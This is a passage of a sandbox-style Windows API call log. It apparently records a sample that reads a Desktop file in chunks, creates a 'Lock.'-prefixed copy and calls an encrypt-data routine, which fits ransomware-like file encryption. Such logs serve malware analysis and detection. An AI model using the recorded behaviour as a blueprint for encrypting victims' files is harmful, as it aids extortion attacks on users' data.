0x2e54bf8 [0165.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0165.521] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0165.521] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.521] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0165.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0165.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0165.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0165.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0165.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0165.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0165.522] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0165.522] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hexif.hex"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0165.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0165.522] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0165.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0165.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0165.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0165.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0165.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.859] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0165.860] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.864] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.866] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.868] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.870] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.873] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.875] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.877] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.880] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.883] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.885] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.887] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.890] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0165.892] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0166.018] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0166.020] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0166.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0166.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0166.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0166.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3f02020 [0166.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3def020 | out: hHeap=0x970000) returned 1 [0166.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0166.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0166.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0166.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0166.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0166.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0166.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0166.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0166.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3de7020 [0166.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3f02020 | out: hHeap=0x970000) returned 1 [0166.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0166.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0166.271] TranslateMessage (lpMsg=0x8cf708) returned 0 [0166.271] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0166.271] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0166.271] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0166.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0166.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0166.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0166.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0166.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0166.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0166.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3ef0020 [0166.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0166.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ef0020 | out: hHeap=0x970000) returned 1 [0166.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0166.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0166.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0166.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0166.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0166.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0166.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0166.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0166.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0166.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0166.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0166.438] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0166.438] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0166.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0166.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0166.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3ef5020 [0166.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0166.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0166.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0166.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0166.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0166.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0166.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0166.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0166.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0166.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x400e020 [0166.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0166.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0166.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0166.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0166.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0166.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0166.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0166.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0166.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0166.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0166.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0166.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0166.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0166.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0166.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0166.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0166.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0166.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0166.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0166.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0166.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 